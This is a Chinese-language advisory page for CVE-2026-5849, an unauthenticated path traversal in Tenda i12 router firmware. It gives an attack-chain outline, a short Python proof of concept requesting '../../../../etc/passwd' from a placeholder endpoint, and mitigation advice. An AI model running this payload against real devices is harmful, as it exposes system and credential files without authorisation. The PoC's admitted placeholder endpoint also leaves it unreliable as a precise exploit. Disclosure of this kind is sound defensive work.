CVE-2026-5849 CVSS 7.3 高危

CVE-2026-5849 Tenda i12 路径遍历漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5849

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda i12

漏洞概述

Tenda i12路由器固件1.0.0.11(3862)版本的HTTP Handler组件被曝出存在路径遍历高危漏洞。该漏洞源于对用户输入参数校验不严，攻击者无需任何身份认证即可远程利用。通过构造包含特殊字符的HTTP请求，攻击者能够绕过目录限制，读取服务器上的任意文件，从而获取敏感系统信息，对设备安全构成严重威胁。

技术细节

该漏洞根因在于Tenda i12路由器HTTP Handler组件在处理特定HTTP请求时，未能对用户提交的参数进行严格的边界检查和路径合法性验证。攻击者可以通过注入包含“../”序列或绝对路径的恶意Payload，欺骗后端程序读取预期目录之外的文件。由于漏洞利用无需认证且攻击向量为网络（AV:N），攻击者可直接向目标端口发送恶意请求。成功利用后，攻击者可读取系统敏感配置文件，严重威胁设备隐私安全，甚至为进一步的攻击提供凭据。此类漏洞通常发生在文件操作功能中，建议深入检查相关代码逻辑。

攻击链分析

STEP 1

信息收集

攻击者扫描网络，寻找暴露的Tenda i12路由器设备及其开放的服务端口。

STEP 2

漏洞探测

向目标设备的HTTP接口发送探测请求，确认其固件版本是否为1.0.0.11(3862)。

STEP 3

构造攻击载荷

利用路径遍历技术，在HTTP请求参数中注入“../”字符序列，试图访问系统敏感文件。

STEP 4

执行攻击

发送构造好的恶意HTTP请求，服务器端解析失败，返回/etc/passwd等敏感文件内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    # Target URL based on the vulnerability details
    # Note: The specific endpoint might vary based on the firmware analysis
    url = f"http://{target_ip}/goform/xxx"  # Placeholder endpoint
    
    # Malicious payload to traverse directories
    payload = {
        "file": "../../../../etc/passwd"
    }
    
    try:
        print(f"[+] Sending payload to {target_ip}...")
        response = requests.get(url, params=payload, timeout=10)
        
        # Check if the payload successfully retrieved the file
        if response.status_code == 200 and "root:" in response.text:
            print("[!] Exploit successful! Sensitive data found:")
            print(response.text)
        else:
            print("[-] Exploit failed or target not vulnerable.")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit(target)

影响范围

Tenda i12 1.0.0.11(3862)

防御指南

临时缓解措施

建议用户立即限制路由器Web管理界面的远程访问权限，仅允许本地网络连接或通过VPN访问。在无法立即升级固件的情况下，可考虑暂时关闭路由器的Web管理服务或通过ACL规则阻断外部对HTTP端口的访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5849
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5849
3 Details https://www.cvedetails.com/cve/CVE-2026-5849/
4 VulDB https://vuldb.com/cve/CVE-2026-5849
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/i12/vul_110/README.md
6 Link https://vuldb.com/submit/791217
7 Link https://vuldb.com/vuln/356375
8 Link https://vuldb.com/vuln/356375/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表